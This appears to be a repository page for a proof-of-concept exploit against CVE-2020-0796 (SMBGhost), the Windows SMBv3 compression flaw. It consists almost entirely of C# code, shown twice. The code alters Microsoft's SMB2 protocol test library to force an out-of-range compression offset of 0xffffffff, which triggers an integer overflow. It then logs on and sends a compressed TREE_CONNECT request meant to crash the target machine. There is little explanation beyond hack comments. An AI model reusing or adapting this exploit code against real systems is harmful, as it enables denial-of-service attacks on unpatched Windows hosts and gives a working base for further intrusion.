potats0/CVE-2020-0796 SMBGhost

## CVE-2020-0796 SMBGhost
// .\WindowsProtocolTestSuites\ProtoSDK\MS-SMB2\Common\Smb2Compression.cs
namespace Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Smb2.Common
{
  /// <summary>
    /// SMB2 Compression Utility.
    /// </summary>
    public static class Smb2Compression
    {
    private static uint i = 0;

    /// <summary>
    /// Compress SMB2 packet.
    /// </summary>
    /// <param name="packet">The SMB2 packet.</param>
    /// <param name="compressionInfo">Compression info.</param>
    /// <param name="role">SMB2 role.</param>
    /// <param name="offset">The offset where compression start, default zero.</param>
    /// <returns></returns>
    public static Smb2Packet Compress(Smb2CompressiblePacket packet, Smb2CompressionInfo compressionInfo, Smb2Role role, uint offset = 0)
    {
        var compressionAlgorithm = GetCompressionAlgorithm(packet, compressionInfo, role);

        /*if (compressionAlgorithm == CompressionAlgorithm.NONE)
        {
            return packet;
        }*/

        // HACK: shitty counter to force Smb2Compression to not compress the first three packets (NEGOTIATE + SSPI login)
        if (i < 3)
        {
            i++;
            return packet;
        }

        var packetBytes = packet.ToBytes();

        var compressor = GetCompressor(compressionAlgorithm);

        // HACK: Insane length to trigger the integrer overflow
        offset = 0xffffffff;

        var compressedPacket = new Smb2CompressedPacket();
        compressedPacket.Header.ProtocolId = Smb2Consts.ProtocolIdInCompressionTransformHeader;
        compressedPacket.Header.OriginalCompressedSegmentSize = (uint)packetBytes.Length;
        compressedPacket.Header.CompressionAlgorithm = compressionAlgorithm;
        compressedPacket.Header.Reserved = 0;
        compressedPacket.Header.Offset = offset;
        compressedPacket.UncompressedData = packetBytes.Take((int)offset).ToArray();
        compressedPacket.CompressedData = compressor.Compress(packetBytes.Skip((int)offset).ToArray());

        var compressedPackectBytes = compressedPacket.ToBytes();

        // HACK: force compressed packet to be sent
        return compressedPacket;

        // Check whether compression shrinks the on-wire packet size
        // if (compressedPackectBytes.Length < packetBytes.Length)
        // {
        //     compressedPacket.OriginalPacket = packet;
        //     return compressedPacket;
        // }
        // else
        // {
        //     return packet;
        // }
    }
  }
}

namespace Microsoft.Protocols.TestManager.BranchCachePlugin
{
  class Program
  {
    static void TriggerCrash(BranchCacheDetector bcd, DetectionInfo info)
    {
      Smb2Client client = new Smb2Client(new TimeSpan(0, 0, defaultTimeoutInSeconds));
      client.CompressionInfo.CompressionIds = new CompressionAlgorithm[] { CompressionAlgorithm.LZ77 };

      // NEGOTIATION is done in "plaintext", this is the call within UserLogon:
      //      client.Negotiate(
      //          0,
      //          1,
      //          Packet_Header_Flags_Values.NONE,
      //          messageId++,
      //          new DialectRevision[] { DialectRevision.Smb311 },
      //          SecurityMode_Values.NEGOTIATE_SIGNING_ENABLED,
      //          Capabilities_Values.NONE,
      //          clientGuid,
      //          out selectedDialect,
      //          out gssToken,
      //          out header,
      //          out negotiateResp,
      //          preauthHashAlgs: new PreauthIntegrityHashID[] { PreauthIntegrityHashID.SHA_512 },  // apprently mandatory for compression
      //          compressionAlgorithms: new CompressionAlgorithm[] { CompressionAlgorithm.LZ77 }
      //      );
      if (!bcd.UserLogon(info, client, out messageId, out sessionId, out clientGuid, out negotiateResp))
        return;

      // From now on, we compress every new packet
      client.CompressionInfo.CompressAllPackets = true;

      // Get tree information about a remote share (which does not exists)
      TREE_CONNECT_Response treeConnectResp;
      string uncSharePath = Smb2Utility.GetUncPath(info.ContentServerName, defaultShare);

      // trigger crash here
      client.TreeConnect(
          1,
          1,
          Packet_Header_Flags_Values.FLAGS_SIGNED,
          messageId++,
          sessionId,
          uncSharePath,
          out treeId,
          out header,
          out treeConnectResp
      );
    }

    static void Main(string[] args)
    {
        Console.WriteLine("Hello World!");

        Logger logger = new Logger();
        AccountCredential accountCredential = new AccountCredential("", "Ghost", "Ghost");

        BranchCacheDetector bcd = new BranchCacheDetector(
            logger,
            "DESKTOP-SMBVULN",
            "DESKTOP-SMBVULN",
            accountCredential
            );

        DetectionInfo info = new DetectionInfo();
        info.SelectedTransport = "SMB2";
        info.ContentServerName = "DESKTOP-SMBVULN";

        info.UserName = "Ghost";
        info.Password = "Ghost";

        TriggerCrash(bcd,info);

        Console.WriteLine("Goodbye World!");
    }
  }
}
	// .\WindowsProtocolTestSuites\ProtoSDK\MS-SMB2\Common\Smb2Compression.cs
	namespace Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Smb2.Common
	{
	/// <summary>
	/// SMB2 Compression Utility.
	/// </summary>
	public static class Smb2Compression
	{
	private static uint i = 0;

	/// <summary>
	/// Compress SMB2 packet.
	/// </summary>
	/// <param name="packet">The SMB2 packet.</param>
	/// <param name="compressionInfo">Compression info.</param>
	/// <param name="role">SMB2 role.</param>
	/// <param name="offset">The offset where compression start, default zero.</param>
	/// <returns></returns>
	public static Smb2Packet Compress(Smb2CompressiblePacket packet, Smb2CompressionInfo compressionInfo, Smb2Role role, uint offset = 0)
	{
	var compressionAlgorithm = GetCompressionAlgorithm(packet, compressionInfo, role);

	/*if (compressionAlgorithm == CompressionAlgorithm.NONE)
	{
	return packet;
	}*/

	// HACK: shitty counter to force Smb2Compression to not compress the first three packets (NEGOTIATE + SSPI login)
	if (i < 3)
	{
	i++;
	return packet;
	}

	var packetBytes = packet.ToBytes();

	var compressor = GetCompressor(compressionAlgorithm);

	// HACK: Insane length to trigger the integrer overflow
	offset = 0xffffffff;

	var compressedPacket = new Smb2CompressedPacket();
	compressedPacket.Header.ProtocolId = Smb2Consts.ProtocolIdInCompressionTransformHeader;
	compressedPacket.Header.OriginalCompressedSegmentSize = (uint)packetBytes.Length;
	compressedPacket.Header.CompressionAlgorithm = compressionAlgorithm;
	compressedPacket.Header.Reserved = 0;
	compressedPacket.Header.Offset = offset;
	compressedPacket.UncompressedData = packetBytes.Take((int)offset).ToArray();
	compressedPacket.CompressedData = compressor.Compress(packetBytes.Skip((int)offset).ToArray());

	var compressedPackectBytes = compressedPacket.ToBytes();

	// HACK: force compressed packet to be sent
	return compressedPacket;

	// Check whether compression shrinks the on-wire packet size
	// if (compressedPackectBytes.Length < packetBytes.Length)
	// {
	// compressedPacket.OriginalPacket = packet;
	// return compressedPacket;
	// }
	// else
	// {
	// return packet;
	// }
	}
	}
	}

	namespace Microsoft.Protocols.TestManager.BranchCachePlugin
	{
	class Program
	{
	static void TriggerCrash(BranchCacheDetector bcd, DetectionInfo info)
	{
	Smb2Client client = new Smb2Client(new TimeSpan(0, 0, defaultTimeoutInSeconds));
	client.CompressionInfo.CompressionIds = new CompressionAlgorithm[] { CompressionAlgorithm.LZ77 };

	// NEGOTIATION is done in "plaintext", this is the call within UserLogon:
	// client.Negotiate(
	// 0,
	// 1,
	// Packet_Header_Flags_Values.NONE,
	// messageId++,
	// new DialectRevision[] { DialectRevision.Smb311 },
	// SecurityMode_Values.NEGOTIATE_SIGNING_ENABLED,
	// Capabilities_Values.NONE,
	// clientGuid,
	// out selectedDialect,
	// out gssToken,
	// out header,
	// out negotiateResp,
	// preauthHashAlgs: new PreauthIntegrityHashID[] { PreauthIntegrityHashID.SHA_512 }, // apprently mandatory for compression
	// compressionAlgorithms: new CompressionAlgorithm[] { CompressionAlgorithm.LZ77 }
	// );
	if (!bcd.UserLogon(info, client, out messageId, out sessionId, out clientGuid, out negotiateResp))
	return;

	// From now on, we compress every new packet
	client.CompressionInfo.CompressAllPackets = true;

	// Get tree information about a remote share (which does not exists)
	TREE_CONNECT_Response treeConnectResp;
	string uncSharePath = Smb2Utility.GetUncPath(info.ContentServerName, defaultShare);

	// trigger crash here
	client.TreeConnect(
	1,
	1,
	Packet_Header_Flags_Values.FLAGS_SIGNED,
	messageId++,
	sessionId,
	uncSharePath,
	out treeId,
	out header,
	out treeConnectResp
	);
	}

	static void Main(string[] args)
	{
	Console.WriteLine("Hello World!");

	Logger logger = new Logger();
	AccountCredential accountCredential = new AccountCredential("", "Ghost", "Ghost");

	BranchCacheDetector bcd = new BranchCacheDetector(
	logger,
	"DESKTOP-SMBVULN",
	"DESKTOP-SMBVULN",
	accountCredential
	);

	DetectionInfo info = new DetectionInfo();
	info.SelectedTransport = "SMB2";
	info.ContentServerName = "DESKTOP-SMBVULN";

	info.UserName = "Ghost";
	info.Password = "Ghost";

	TriggerCrash(bcd,info);

	Console.WriteLine("Goodbye World!");
	}
	}
	}